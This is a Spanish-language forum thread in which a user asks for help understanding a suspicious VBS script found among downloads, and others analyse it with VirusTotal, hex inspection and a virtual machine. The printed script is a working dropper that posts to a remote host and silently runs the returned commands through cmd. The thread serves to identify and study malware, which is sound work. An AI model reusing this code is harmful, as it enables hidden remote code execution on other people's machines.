Descargando unas cositas me he encontrado con un vbs bastante interesante y me gustaria saber que hace, se que transfiere un script al disco duro con extension .au3 pero no he podido abrirlo para ver que hace, alguna idea?
Este es el script
dim Winhttps
Set Winhttps = CreateObject("Winhttp.WinhttpRequest.5.1")
gkpaeb1 = "http://82.111.231.133.static.cdnserver.in/"
Winhttps.Open "POST", gkpaeb1, False
Winhttps.Send
dim Application
Application = Wscript.ScriptName
CreateObject("Shell.Application").Application.ShellExecute "c:\windows\system32\cmd",Winhttps.responseText & Application,gkpaeb,"",0
Hola xDark_R,
Actualmente la página http://82.111.231.133.static.cdnserver.in está caída, por lo que es imposible saber con exactitud qué es lo que hace este supuesto virus. El resultado del escaneo de VirusTotal no es demasiado "revelador", puedes echarle un vistazo aquí (https://www.virustotal.com/gui/file/3174c941d46383c6d69749b79c547886cc0e13f937a75a3891669d21c07b7661/detection).
Tal vez, si subieras el archivo .au3 que mencionaste, podríamos ayudarte mejor.
¡Saludos!
Edito: Busca literalmente "cdnserver.in" (con las comillas y todo) en Google, parece haber algo de información por ahí. Seguiré investigando.
No se como subirlo, tambien he visto que esta caida pero lo he ejecutado en una maquina virtual y si que funciona.
Por lo de cómo subirlo, cámbiale la extensión a una conocida y súbelo a algún servicio del estilo MEGA que no examine los archivos (maldito Google Drive). Creo que MEGA incluso te deja subir archivos con la extensión que quieras.
Otra cosa que podés hacer antes que nada es abrir el archivo con el Notepad++ o un editor hexadecimal (Bless, hexdump) y fijarte cuales son los primeros seis caracteres, con eso podés saber qué tipo de archivo es en realidad (saber su MIME Type).
Con respecto a lo de la máquina virtual, :o, es algún tipo de protección que ofrece Cloudflare, pero no sé más qué decir.
He subido todo lo que he conseguido, en la foto esta el código que se ejecuta en la consola de windows y en la carpeta están los archivos que descarga el script
https://mega.nz/#F!5sJg3IhR!klSoZowEAxN7CQVsg8KxZQ (https://mega.nz/#F!5sJg3IhR!klSoZowEAxN7CQVsg8KxZQ)
Bueno, el código de la imagen es simplemente una manera "elegante" de descargar los archivos y ejecutar el script de AutoIt base.au3. Buscaré una forma de descompilarlo (las hay miles) pero, mientras tanto, ¿podrías subir el contenido del archivo %temp%\test.txt?
No se crea ese archivo lo he ejecutado varias veces y nada, puede que lo borre después con el otro script (el .au3).
Hmmm... Interesante. Mañana continuaré con la "investigación" :rolleyes:.